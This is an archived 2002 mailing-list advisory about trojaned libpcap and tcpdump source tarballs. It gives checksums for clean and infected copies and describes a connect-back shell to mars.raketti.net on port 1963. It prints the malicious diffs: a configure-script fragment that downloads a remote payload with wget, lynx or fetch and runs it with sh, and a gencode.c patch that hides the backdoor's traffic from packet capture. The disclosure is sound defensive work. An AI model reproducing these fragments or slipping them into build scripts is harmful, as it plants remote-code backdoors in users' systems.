Updates: * Many Mirrors are infected with the trojan Background: * Libpcap provides a packet sniffing library for programs like Snort. * Tcpdump is a standard tool for packet sniffing. Details: * The trojan contains modifications to the configure script and gencode.c (in libpcap only). * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: * A - program exits * D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. * M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. * This is similar to the OpenSSH trojan a few months ago. Good sources: http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1>/dev/null 2>/dev/null & The "services" payload: * trojan-script, the non-obfuscated portion (excerpted) * services, the complete version Thanks to: Russell Adams <rladamsat_private> Mathew Solnik <msolnikat_private> Scott Stout <skoutat_private> with the Houston Linux Users Group. Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Gentoo's Portage system for catching the trojaned -- Mincu Alexandru <alexat_private>
This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 19:51:44 PST